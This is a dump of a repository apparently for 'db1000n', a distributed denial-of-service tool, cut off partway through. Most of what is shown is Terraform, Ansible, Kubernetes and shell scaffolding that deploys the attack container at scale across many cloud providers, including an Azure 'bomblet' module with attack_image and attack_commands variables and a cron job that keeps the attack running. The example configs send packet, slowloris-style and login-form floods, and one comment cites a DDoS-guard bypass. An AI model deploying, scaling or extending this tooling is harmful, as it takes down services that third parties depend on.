├── openvpn └── .gitkeep ├── .gitattributes ├── .github ├── CODEOWNERS ├── issue_template.md ├── workflows │ ├── gh-pages.yml │ ├── kubernetes-lint.yaml │ ├── docker-lint.yaml │ ├── terraformci.yaml │ ├── test.yaml │ ├── markdownlint.yaml │ ├── test-installer.yaml │ ├── goreleaser-action.yaml │ ├── ko-release.yaml │ ├── ko-build.yaml │ ├── golangci-lint.yaml │ ├── release-docker-advanced.yaml │ └── codeql-analysis.yml └── pull_request_template.md ├── Procfile ├── ansible ├── aws │ ├── AWS.pub │ ├── README.md │ └── aws-provisioning.yaml └── linux │ ├── inventory.cfg.example │ ├── countries.txt │ ├── README.md │ └── setup.yaml ├── terraform ├── aws_eks │ ├── data.tf │ ├── modules │ │ ├── kubernetes │ │ │ ├── data.tf │ │ │ ├── providers.tf │ │ │ └── variables.tf │ │ ├── network │ │ │ ├── data.tf │ │ │ ├── variables.tf │ │ │ ├── outputs.tf │ │ │ └── main.tf │ │ ├── eks-nodes │ │ │ ├── outputs.tf │ │ │ ├── data.tf │ │ │ └── variables.tf │ │ └── eks-cluster │ │ │ ├── outputs.tf │ │ │ ├── variables.tf │ │ │ ├── data.tf │ │ │ └── main.tf │ ├── providers.tf │ ├── scripts │ │ └── node-user-data.sh │ ├── versions.tf │ ├── outputs.tf │ ├── variables.tf │ ├── main.tf │ └── README.md ├── vultr │ ├── outputs.tf │ ├── scripts │ │ └── deploy.sh │ ├── variable.tf │ ├── main.tf │ └── README.md ├── hetzner_cloud │ ├── outputs.tf │ ├── terraform.tfvars │ ├── provider.tf │ ├── main.tf │ ├── variables.tf │ ├── user_data.yml │ └── README.md ├── aws_lightsail │ ├── terraform.tfvars │ ├── provider.tf │ ├── README.md │ ├── main.tf │ └── variables.tf ├── digital_ocean │ ├── terraform.tfvars │ ├── provider.tf │ ├── main.tf │ ├── README.md │ └── variables.tf ├── azure │ ├── requirements.tf │ ├── bomblet │ │ ├── requirements.tf │ │ ├── variables.tf │ │ └── main.tf │ ├── variables.tf │ ├── README.md │ └── main.tf ├── aws_ec2 │ ├── ireland.tfvars │ ├── README.md │ └── variables.tf ├── gcp_expressvpn │ ├── versions.tf │ ├── variables.tf │ ├── README.md │ └── main.tf └── heroku │ ├── provider.tf │ 
├── terraform.tfvars │ ├── main.tf │ ├── variables.tf │ └── README.md ├── db1000n.rb ├── docs ├── license.md ├── advanced-docs │ ├── terraform │ │ ├── azure.md │ │ ├── vultr.md │ │ ├── heroku.md │ │ ├── aws_ec2.md │ │ ├── aws_eks.md │ │ ├── gcp.md │ │ ├── aws_lightsail.md │ │ ├── digital-ocean.md │ │ └── hetzner-cloud.md │ ├── kubernetes │ │ ├── helm-charts.md │ │ └── manifests.md │ ├── pull-request-template.md │ ├── docker-vpn.md │ └── advanced-and-devs.md ├── over-the-air.md ├── index.md └── faq.md ├── kubernetes ├── helm-charts │ ├── Chart.yaml │ ├── .helmignore │ ├── README.md │ ├── values.yaml │ └── templates │ │ ├── deployment.yaml │ │ └── _helpers.tpl └── manifests │ ├── deployment.yaml │ ├── daemonset.yaml │ └── README.md ├── examples ├── config │ ├── http-host.yaml │ ├── advanced │ │ ├── packetgen-udp.yaml │ │ ├── packetgen-tcp.yaml │ │ ├── locker.yaml │ │ ├── packetgen-dnsblast.yaml │ │ ├── packetgen.yaml │ │ ├── packetgen-ipv6.yaml │ │ ├── packetgen-slowloris.yaml │ │ └── qrator.yaml │ ├── http-login.json │ └── js.yaml └── docker │ └── static-docker-compose.yml ├── src ├── utils │ ├── utils_windows.go │ ├── ota │ │ ├── restart.go │ │ ├── shared.go │ │ ├── restart_windows.go │ │ ├── restart_darwin.go │ │ ├── restart_linux.go │ │ ├── shared_test.go │ │ ├── README.md │ │ └── ota.go │ ├── locker.go │ ├── metrics │ │ ├── stats_tracker.go │ │ ├── serve.go │ │ ├── accumulator.go │ │ ├── stats.go │ │ ├── reporter.go │ │ └── metrics.go │ ├── templates │ │ ├── math.go │ │ └── encoding.go │ ├── backoff.go │ ├── utils_unix.go │ ├── proxy.go │ └── crypto.go ├── job │ ├── config │ │ ├── defaultconfig.go │ │ └── updater.go │ ├── rawnet.go │ └── complex.go └── core │ └── packetgen │ ├── raw_conn_windows.go │ ├── raw_conn_unix.go │ ├── serialization.go │ ├── link.go │ ├── packetgen.go │ ├── network.go │ ├── connection.go │ └── transport.go ├── .ko.yaml ├── pyproject.toml ├── .gitignore ├── Dockerfile ├── README.md ├── testconfig.yaml ├── LICENSE ├── golangci-lint.nix ├── 
.goreleaser.yaml ├── Makefile ├── testconfig.json ├── go.mod ├── install.sh ├── mkdocs.yml └── scripts └── StartDB1000N.bat /openvpn/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | *.go text eol=lf -------------------------------------------------------------------------------- /.github/CODEOWNERS: -------------------------------------------------------------------------------- 1 | * @Arriven 2 | -------------------------------------------------------------------------------- /Procfile: -------------------------------------------------------------------------------- 1 | worker: bin/db1000n 2 | -------------------------------------------------------------------------------- /ansible/aws/AWS.pub: -------------------------------------------------------------------------------- 1 | -- here you put your public key -- -------------------------------------------------------------------------------- /terraform/aws_eks/data.tf: -------------------------------------------------------------------------------- 1 | data "aws_caller_identity" "current" {} -------------------------------------------------------------------------------- /terraform/aws_eks/modules/kubernetes/data.tf: -------------------------------------------------------------------------------- 1 | data "aws_region" "current" {} -------------------------------------------------------------------------------- /db1000n.rb: -------------------------------------------------------------------------------- 1 | all 2 | exclude_rule 'MD046' 3 | exclude_rule 'MD007' 4 | exclude_rule 'MD013' 5 | -------------------------------------------------------------------------------- /terraform/vultr/outputs.tf: -------------------------------------------------------------------------------- 1 | output 
"ip" { 2 | value = vultr_instance.my_instance[*].main_ip 3 | } 4 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/outputs.tf: -------------------------------------------------------------------------------- 1 | output "ips" { 2 | value = hcloud_server.server[*].ipv4_address 3 | } -------------------------------------------------------------------------------- /docs/license.md: -------------------------------------------------------------------------------- 1 | # License 2 | 3 | {% 4 | include-markdown "../LICENSE" 5 | start="MIT License" 6 | %} -------------------------------------------------------------------------------- /terraform/aws_eks/providers.tf: -------------------------------------------------------------------------------- 1 | provider "aws" { 2 | region = var.region 3 | profile = var.profile 4 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/data.tf: -------------------------------------------------------------------------------- 1 | data "aws_availability_zones" "available" { 2 | state = "available" 3 | } -------------------------------------------------------------------------------- /terraform/aws_lightsail/terraform.tfvars: -------------------------------------------------------------------------------- 1 | scale = 1 2 | power = "medium" 3 | region_name = "eu-central-1" 4 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/terraform.tfvars: -------------------------------------------------------------------------------- 1 | instance_count = 1 2 | location = "hel1" 3 | server_type = "cx11" 4 | -------------------------------------------------------------------------------- /terraform/digital_ocean/terraform.tfvars: -------------------------------------------------------------------------------- 1 | instance_count = 1 2 | instance_size_slug = "professional-xs" 3 | 
region = "nyc" 4 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v2 2 | name: db1000n 3 | description: db1000n Helm chart 4 | 5 | type: application 6 | version: 1.0.0 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/azure.md: -------------------------------------------------------------------------------- 1 | # Azure 2 | 3 | {% 4 | include "../../../terraform/azure/README.md" 5 | start="# Deploy via Azure" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/vultr.md: -------------------------------------------------------------------------------- 1 | # Vultr 2 | 3 | {% 4 | include "../../../terraform/vultr/README.md" 5 | start="# Vultr deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/heroku.md: -------------------------------------------------------------------------------- 1 | # Heroku 2 | 3 | {% 4 | include "../../../terraform/heroku/README.md" 5 | start="# Heroku deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/over-the-air.md: -------------------------------------------------------------------------------- 1 | # Over the air updates 2 | 3 | {% 4 | include-markdown "../src/utils/ota/README.md" 5 | start="# Over-the-air updates" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/aws_ec2.md: -------------------------------------------------------------------------------- 1 | # AWS EC2 2 | 3 | {% 4 | include "../../../terraform/aws_ec2/README.md" 5 | start="# AWS EC2 deployment" 6 | %} 7 | 
-------------------------------------------------------------------------------- /docs/advanced-docs/terraform/aws_eks.md: -------------------------------------------------------------------------------- 1 | # AWS EKS 2 | 3 | {% 4 | include "../../../terraform/aws_eks/README.md" 5 | start="# AWS EKS deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/gcp.md: -------------------------------------------------------------------------------- 1 | # GCP 2 | 3 | {% 4 | include "../../../terraform/gcp_expressvpn/README.md" 5 | start="# GCP + ExpressVPN deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/kubernetes/helm-charts.md: -------------------------------------------------------------------------------- 1 | # Helm charts 2 | 3 | {% 4 | include "../../../kubernetes/helm-charts/README.md" 5 | start="# db1000n Helm charts" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/pull-request-template.md: -------------------------------------------------------------------------------- 1 | # Pull request template 2 | 3 | {% 4 | include-markdown "../../.github/pull_request_template.md" 5 | start="# Description" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/aws_lightsail.md: -------------------------------------------------------------------------------- 1 | # AWS Lightsail 2 | 3 | {% 4 | include "../../../terraform/aws_lightsail/README.md" 5 | start="# AWS Lightsail deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/digital-ocean.md: -------------------------------------------------------------------------------- 1 | # Digital Ocean 2 | 3 | {% 4 | include "../../../terraform/digital_ocean/README.md" 5 | start="# 
Digital Ocean deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /docs/advanced-docs/terraform/hetzner-cloud.md: -------------------------------------------------------------------------------- 1 | # Hetzner Cloud 2 | 3 | {% 4 | include "../../../terraform/hetzner_cloud/README.md" 5 | start="# Hetzner Cloud deployment" 6 | %} 7 | -------------------------------------------------------------------------------- /terraform/azure/requirements.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | azurerm = { 4 | source = "hashicorp/azurerm" 5 | version = "=2.97.0" 6 | } 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /docs/advanced-docs/kubernetes/manifests.md: -------------------------------------------------------------------------------- 1 | # Manifests install 2 | 3 | {% include 4 | "../../../kubernetes/manifests/README.md" 5 | start="# Kubernetes manifests to install" 6 | %} 7 | -------------------------------------------------------------------------------- /terraform/aws_eks/scripts/node-user-data.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -xe 2 | 3 | sudo /etc/eks/bootstrap.sh --apiserver-endpoint "${CLUSTER_ENDPOINT}" --b64-cluster-ca "${CLUSTER_CA_DATA}" "${CLUSTER_NAME}" 4 | -------------------------------------------------------------------------------- /terraform/azure/bomblet/requirements.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | azurerm = { 4 | source = "hashicorp/azurerm" 5 | version = "=2.97.0" 6 | } 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /terraform/aws_ec2/ireland.tfvars: -------------------------------------------------------------------------------- 1 | # Make changes in this 
file 2 | region = "eu-west-1" 3 | name = "ir-db1000n" 4 | desired_capacity = 2 5 | min_size = 0 6 | max_size = 32 7 | zones = 2 8 | -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/versions.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | google = { 4 | source = "hashicorp/google" 5 | } 6 | } 7 | } 8 | 9 | provider "google" { 10 | project = var.project_id 11 | } 12 | -------------------------------------------------------------------------------- /examples/config/http-host.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: http 3 | args: 4 | request: 5 | method: GET 6 | path: http://lolkek/test 7 | client: 8 | static_host: 9 | addr: 127.0.0.1:8080 10 | -------------------------------------------------------------------------------- /.github/issue_template.md: -------------------------------------------------------------------------------- 1 | ## Expected Behavior 2 | 3 | 4 | ## Actual Behavior 5 | 6 | 7 | ## Steps to Reproduce the Problem 8 | 9 | 1. 10 | 2. 11 | 3. 
12 | 13 | ## Specifications 14 | 15 | - Version: 16 | - Platform: 17 | - Subsystem: 18 | -------------------------------------------------------------------------------- /terraform/aws_eks/versions.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_version = ">= 1.0.9" 3 | required_providers { 4 | aws = { 5 | version = "= 4.5.0" 6 | } 7 | kubernetes = { 8 | version = ">= 2.9.0" 9 | } 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /ansible/linux/inventory.cfg.example: -------------------------------------------------------------------------------- 1 | [target] 2 | ansible_connection=ssh ansible_ssh_user= 3 | 4 | [target:vars] 5 | ansible_python_interpreter=/usr/bin/python3 6 | setup_vpn= 7 | expressvpn_activation_code= 8 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-nodes/outputs.tf: -------------------------------------------------------------------------------- 1 | output "security_group_id" { 2 | description = "EKS node Security group ID" 3 | value = aws_security_group.eks_nodes.id 4 | } 5 | 6 | output "worker_node_iam_role_arn" { 7 | value = aws_iam_role.eks_worker_node.arn 8 | } -------------------------------------------------------------------------------- /terraform/hetzner_cloud/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | hcloud = { 4 | source = "hetznercloud/hcloud" 5 | version = "~> 1.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "hcloud" { 12 | token = var.hcloud_token 13 | } 14 | -------------------------------------------------------------------------------- /terraform/heroku/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | heroku = { 4 | source = "heroku/heroku" 5 
| version = "~> 5.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "heroku" { 12 | email = var.email 13 | api_key = var.api_key 14 | } 15 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | awslightsail = { 4 | source = "DeYoungTech/awslightsail" 5 | version = "0.7.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "awslightsail" { 12 | region = var.region_name 13 | } 14 | -------------------------------------------------------------------------------- /terraform/digital_ocean/provider.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | digitalocean = { 4 | source = "digitalocean/digitalocean" 5 | version = "~> 2.0" 6 | } 7 | } 8 | required_version = "~> 1.0" 9 | } 10 | 11 | provider "digitalocean" { 12 | token = var.do_token 13 | } 14 | -------------------------------------------------------------------------------- /terraform/heroku/terraform.tfvars: -------------------------------------------------------------------------------- 1 | # Latest release: https://github.com/Arriven/db1000n/releases/latest 2 | app_version = "0.8.20" 3 | 4 | # If you want to use more that 1 instance and larger instance type 5 | # make sure that your Credit Card is attached to the account 6 | instance_count = 1 7 | instance_type = "free" 8 | -------------------------------------------------------------------------------- /src/utils/utils_windows.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "syscall" 4 | 5 | func UpdateRLimit() error { 6 | return nil 7 | } 8 | 9 | func BindToInterface(name string) func(network, address string, conn syscall.RawConn) error { 10 | return func(network, address string, conn 
syscall.RawConn) error { 11 | return nil 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-udp.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: net 6 | args: 7 | protocol: "udp" 8 | address: "localhost:1234" 9 | packet: 10 | payload: 11 | type: raw 12 | data: 13 | payload: "test" 14 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/README.md: -------------------------------------------------------------------------------- 1 | # AWS Lightsail deployment 2 | 3 | ## Requirements 4 | 5 | - AWS account 6 | - `terraform` (1.0+) installed 7 | 8 | ## Deploy 9 | 10 | To deploy: 11 | 12 | ```sh 13 | terraform init 14 | terraform plan 15 | terraform apply 16 | ``` 17 | 18 | ## Destroy 19 | 20 | To destroy: 21 | 22 | ```sh 23 | terraform destroy 24 | ``` 25 | -------------------------------------------------------------------------------- /src/utils/ota/restart.go: -------------------------------------------------------------------------------- 1 | //go:build !linux && !darwin && !windows 2 | // +build !linux,!darwin,!windows 3 | 4 | package ota 5 | 6 | import ( 7 | "fmt" 8 | "runtime" 9 | 10 | "go.uber.org/zap" 11 | ) 12 | 13 | func restart(logger *zap.Logger, extraArgs ...string) error { 14 | return fmt.Errorf("restart on the %s system is not available", runtime.GOOS) 15 | } 16 | -------------------------------------------------------------------------------- /terraform/vultr/scripts/deploy.sh: -------------------------------------------------------------------------------- 1 | #! 
/bin/bash 2 | 3 | apt install -y vnstat 4 | 5 | container_name="db1000n" 6 | docker_cmd="docker run -d -it --rm --name=${container_name} -e ENABLE_PRIMITIVE=false --pull always ghcr.io/arriven/db1000n" 7 | 8 | ${docker_cmd} 9 | 10 | echo "0 */2 * * * docker kill ${container_name} || true && ${docker_cmd}" >> cronjob 11 | crontab cronjob 12 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-tcp.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: net 6 | args: 7 | protocol: "tcp" 8 | address: "localhost:1234" 9 | tls_config: 10 | insecure_skip_verify: true 11 | packet: 12 | payload: 13 | type: raw 14 | data: 15 | payload: "test" 16 | -------------------------------------------------------------------------------- /terraform/vultr/variable.tf: -------------------------------------------------------------------------------- 1 | 2 | variable "region" { 3 | default = "icn" # Seoul, South Korea 4 | } 5 | 6 | variable "plan" { 7 | default = "vc2-1c-1gb" 8 | } 9 | 10 | variable "app" { 11 | description = "Docker Ubuntu 20.04" 12 | default = "37" 13 | } 14 | 15 | variable "key" { 16 | description = "Path to SSH key" 17 | type = string 18 | } 19 | 20 | variable "num_inst" { 21 | type = number 22 | } 23 | -------------------------------------------------------------------------------- /src/utils/locker.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "sync" 4 | 5 | type Locker struct { 6 | mutexes sync.Map // Zero value is empty and ready for use 7 | } 8 | 9 | func (m *Locker) Lock(key string) func() { 10 | value, _ := m.mutexes.LoadOrStore(key, &sync.Mutex{}) 11 | 12 | mtx, ok := value.(*sync.Mutex) 13 | if ok { 14 | mtx.Lock() 15 | 16 | return func() { mtx.Unlock() } 17 | } 18 | 19 | return func() {} 20 | } 21 | 
-------------------------------------------------------------------------------- /terraform/aws_eks/modules/kubernetes/providers.tf: -------------------------------------------------------------------------------- 1 | provider "kubernetes" { 2 | host = var.cluster_endpoint 3 | cluster_ca_certificate = base64decode(var.cluster_ca_data) 4 | # generate token 5 | exec { 6 | api_version = "client.authentication.k8s.io/v1alpha1" 7 | command = "aws" 8 | args = ["--profile", var.profile, "eks", "get-token", "--cluster-name", var.cluster_name] 9 | 10 | } 11 | } -------------------------------------------------------------------------------- /.github/workflows/gh-pages.yml: -------------------------------------------------------------------------------- 1 | name: PushToGithubPages 2 | 3 | on: 4 | push: 5 | tags: ["**"] 6 | branches: ["main"] 7 | 8 | jobs: 9 | deploy: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - uses: actions/checkout@v2 13 | - uses: actions/setup-python@v2 14 | with: 15 | python-version: 3.x 16 | - run: pip install poetry 17 | - run: poetry update 18 | - run: poetry run mkdocs gh-deploy --force 19 | -------------------------------------------------------------------------------- /.github/workflows/kubernetes-lint.yaml: -------------------------------------------------------------------------------- 1 | name: kubernetes-lint 2 | 3 | on: 4 | pull_request: 5 | branches: 6 | - main 7 | paths: 8 | - 'kubernetes/manifests/**' 9 | 10 | jobs: 11 | kubeval: 12 | runs-on: ubuntu-latest 13 | steps: 14 | - name: Checkout 15 | uses: actions/checkout@v2 16 | - name: Kubeval 17 | uses: instrumenta/kubeval-action@master 18 | with: 19 | files: kubernetes/manifests/ 20 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/.helmignore: -------------------------------------------------------------------------------- 1 | # Patterns to ignore when building packages. 
2 | # This supports shell glob matching, relative path matching, and 3 | # negation (prefixed with !). Only one pattern per line. 4 | .DS_Store 5 | # Common VCS dirs 6 | .git/ 7 | .gitignore 8 | .bzr/ 9 | .bzrignore 10 | .hg/ 11 | .hgignore 12 | .svn/ 13 | # Common backup files 14 | *.swp 15 | *.bak 16 | *.tmp 17 | *.orig 18 | *~ 19 | # Various IDEs 20 | .project 21 | .idea/ 22 | *.tmproj 23 | .vscode/ 24 | -------------------------------------------------------------------------------- /examples/config/http-login.json: -------------------------------------------------------------------------------- 1 | { 2 | "jobs": [ 3 | { 4 | "type": "http", 5 | "args": { 6 | "request": { 7 | "method": "POST", 8 | "path": "http://localhost:8080/login", 9 | "headers": { 10 | "Content-Type": "application/x-www-form-urlencoded" 11 | }, 12 | "body": "username={{random_alphanum 10}}&password={{random_payload_byte (random_int_n 5 | add 5) | base64_encode}}" 13 | } 14 | } 15 | } 16 | ] 17 | } 18 | -------------------------------------------------------------------------------- /examples/config/advanced/locker.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: lock 3 | args: 4 | key: test 5 | job: 6 | type: loop 7 | args: 8 | interval: 1s 9 | job: 10 | type: log 11 | args: 12 | text: test 13 | - type: lock 14 | args: 15 | key: test 16 | job: 17 | type: loop 18 | args: 19 | interval: 1s 20 | job: 21 | type: log 22 | args: 23 | text: test2 24 | -------------------------------------------------------------------------------- /terraform/azure/bomblet/variables.tf: -------------------------------------------------------------------------------- 1 | variable "prefix" {} 2 | 3 | variable "region" {} 4 | 5 | variable "bomblet_count" {} 6 | 7 | variable "resource_group_name" {} 8 | 9 | variable "attack_image" { 10 | default = "ghcr.io/arriven/db1000n:latest" 11 | } 12 | 13 | variable "attack_cpu" { 14 | default = "1" 15 | } 16 | 17 | 
variable "attack_memory" { 18 | default = "1.5" 19 | } 20 | 21 | variable "attack_environment_variables" { 22 | default = {} 23 | } 24 | 25 | variable "attack_commands" { 26 | default = null 27 | } 28 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/main.tf: -------------------------------------------------------------------------------- 1 | resource "hcloud_ssh_key" "key" { 2 | name = "db1000n_key" 3 | public_key = var.ssh_public_key 4 | } 5 | 6 | resource "hcloud_server" "server" { 7 | count = var.instance_count 8 | name = "db1000n-server-${count.index}" 9 | image = var.os_type 10 | server_type = var.server_type 11 | location = var.location 12 | ssh_keys = [hcloud_ssh_key.key.id] 13 | 14 | labels = { 15 | app = "db1000n" 16 | } 17 | 18 | user_data = file("user_data.yml") 19 | } 20 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/main.tf: -------------------------------------------------------------------------------- 1 | resource "awslightsail_container_service" "service" { 2 | name = "${var.app}-service" 3 | power = var.power 4 | scale = var.scale 5 | } 6 | 7 | resource "awslightsail_container_deployment" "deployment" { 8 | container_service_name = awslightsail_container_service.service.id 9 | container { 10 | container_name = "${var.app}-deployment" 11 | image = var.image 12 | 13 | environment { 14 | key = "ENABLE_PRIMITIVE" 15 | value = "false" 16 | } 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /src/utils/ota/shared.go: -------------------------------------------------------------------------------- 1 | package ota 2 | 3 | func appendArgIfNotPresent(osArgs, extraArgs []string) []string { 4 | osArgsMap := make(map[string]any, len(osArgs)) 5 | for _, osArg := range osArgs { 6 | osArgsMap[osArg] = nil 7 | } 8 | 9 | acceptedExtraArgs := make([]string, 0) 10 | 11 | for _, extraArg := range 
extraArgs { 12 | if _, isAlreadyOSArg := osArgsMap[extraArg]; !isAlreadyOSArg { 13 | acceptedExtraArgs = append(acceptedExtraArgs, extraArg) 14 | } 15 | } 16 | 17 | return append(osArgs, acceptedExtraArgs...) 18 | } 19 | -------------------------------------------------------------------------------- /src/job/config/defaultconfig.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "encoding/base64" 5 | ) 6 | 7 | // DefaultConfig is the config embedded into the app that it will use if not able to fetch any other config 8 | // 9 | //nolint:lll // Makes no sense splitting this into multiple lines 10 | var DefaultConfig = `` 11 | 12 | func init() { 13 | decoded, err := base64.StdEncoding.DecodeString(DefaultConfig) 14 | if err != nil { 15 | panic("Can't decode base64 encoded encrypted config") 16 | } 17 | 18 | DefaultConfig = string(decoded) 19 | } 20 | -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project_id" { 2 | description = "GCP project id" 3 | } 4 | 5 | variable "expressvpn_key" { 6 | description = "expressvpn activation key" 7 | } 8 | 9 | variable "machine_type" { 10 | description = "GCP machine type" 11 | default = "n1-standard-1" 12 | } 13 | 14 | variable "machine_location" { 15 | description = "machine location" 16 | default = "us-central1-a" 17 | } 18 | 19 | variable "machine_count" { 20 | description = "how many VM's will be created" 21 | default = 2 22 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/variables.tf: -------------------------------------------------------------------------------- 1 | variable "name" { 2 | description = "VPC name" 3 | } 4 | 5 | variable "tags" { 6 | description = "A map of tags to add to VPC" 7 | } 8 | 9 | variable 
"vpc_cidr_block" { 10 | description = "Base CIDR block which is divided into subnet CIDR blocks (e.g. `10.0.0.0/16`)" 11 | default = "10.0.0.0/16" 12 | } 13 | 14 | variable "amount_az" { 15 | description = "Desired Availability Zones (must be greater than 0). Number of available zones depends on region." 16 | default = "2" 17 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/outputs.tf: -------------------------------------------------------------------------------- 1 | output "endpoint" { 2 | value = aws_eks_cluster.eks_cluster.endpoint 3 | } 4 | 5 | output "ca_data" { 6 | value = aws_eks_cluster.eks_cluster.certificate_authority.0.data 7 | } 8 | 9 | output "security_group_id" { 10 | description = "EKS Control Plane Security group ID" 11 | value = aws_security_group.control_plane.id 12 | } 13 | 14 | output "autoscaler_iam_role_arn" { 15 | description = "EKS cluster autoscaler role ARN" 16 | value = aws_iam_role.eks_cluster_autoscaler.arn 17 | } -------------------------------------------------------------------------------- /terraform/aws_eks/modules/eks-cluster/variables.tf: -------------------------------------------------------------------------------- 1 | variable "vpc_id" { 2 | description = "VPC ID" 3 | } 4 | 5 | variable "cluster_name" { 6 | description = "EKS cluster name" 7 | } 8 | 9 | variable "cluster_version" { 10 | description = "EKS cluster version" 11 | } 12 | 13 | variable "source_security_groups" { 14 | description = "A list of source security groups which can connect to the EKS cluster" 15 | } 16 | 17 | variable "subnets" { 18 | description = "A list of subnets to place the EKS cluster" 19 | type = list(string) 20 | } 21 | 22 | -------------------------------------------------------------------------------- /.github/workflows/docker-lint.yaml: -------------------------------------------------------------------------------- 1 | name: docker-lint 2 | 3 | on: 4 | push: 5 | 
branches: 6 | - main 7 | pull_request: 8 | branches: 9 | - main 10 | paths: 11 | - "Dockerfile" 12 | - ".github/workflows/docker-lint.yaml" 13 | 14 | jobs: 15 | docker: 16 | runs-on: ubuntu-latest 17 | steps: 18 | - uses: actions/checkout@v2 19 | - uses: hadolint/hadolint-action@v1.6.0 20 | with: 21 | dockerfile: Dockerfile 22 | ignore: DL3018 23 | - name: Test image building 24 | run: make docker_build 25 | -------------------------------------------------------------------------------- /terraform/digital_ocean/main.tf: -------------------------------------------------------------------------------- 1 | resource "digitalocean_app" "db1000n" { 2 | spec { 3 | name = "db1000n" 4 | region = var.region 5 | 6 | worker { 7 | name = "db1000n-service" 8 | environment_slug = "go" 9 | instance_count = var.instance_count 10 | instance_size_slug = var.instance_size_slug 11 | 12 | env { 13 | key = "CONFIG" 14 | value = var.config_path 15 | } 16 | 17 | git { 18 | repo_clone_url = var.repo 19 | branch = "main" 20 | } 21 | } 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/network/outputs.tf: -------------------------------------------------------------------------------- 1 | output "vpc_id" { 2 | description = "VPC ID" 3 | value = aws_vpc.vpc.id 4 | } 5 | 6 | output "availability_zones" { 7 | description = "List of available Availability Zones for selected region" 8 | value = data.aws_availability_zones.available.names 9 | } 10 | 11 | output "public_subnet_ids" { 12 | description = "Public subnet ID" 13 | value = aws_subnet.public.*.id 14 | } 15 | 16 | output "private_subnet_ids" { 17 | description = "Private subnet ID" 18 | value = aws_subnet.private.*.id 19 | } -------------------------------------------------------------------------------- /examples/config/js.yaml: -------------------------------------------------------------------------------- 1 | # this scenario copies the one from 
https://git.gay/a/ddos-guard-bypass/src/branch/master/index.js 2 | # it is here for educational purposes only and is meant to showcase the capabilities of the tool 3 | jobs: 4 | - type: sequence 5 | args: 6 | jobs: 7 | - type: js 8 | name: testscript 9 | args: 10 | script: arg1 + arg2 11 | data: 12 | arg1: 2 13 | arg2: 4 14 | - type: log 15 | args: 16 | text: 'testscript result: {{ .Value (ctx_key "data.testscript") }}' 17 | -------------------------------------------------------------------------------- /terraform/aws_lightsail/variables.tf: -------------------------------------------------------------------------------- 1 | variable "app" { 2 | type = string 3 | default = "db1000n" 4 | } 5 | 6 | variable "image" { 7 | type = string 8 | default = "ghcr.io/arriven/db1000n:latest" 9 | } 10 | 11 | variable "scale" { 12 | type = number 13 | default = 1 14 | } 15 | 16 | # https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-creating-container-services#create-container-service-capacity 17 | variable "power" { 18 | type = string 19 | default = "medium" 20 | } 21 | 22 | variable "region_name" { 23 | type = string 24 | default = "eu-central-1" 25 | } 26 | -------------------------------------------------------------------------------- /terraform/azure/variables.tf: -------------------------------------------------------------------------------- 1 | variable "bomblet_count" { 2 | type = number 3 | default = 1 4 | description = "Number of containers per region." 5 | } 6 | 7 | variable 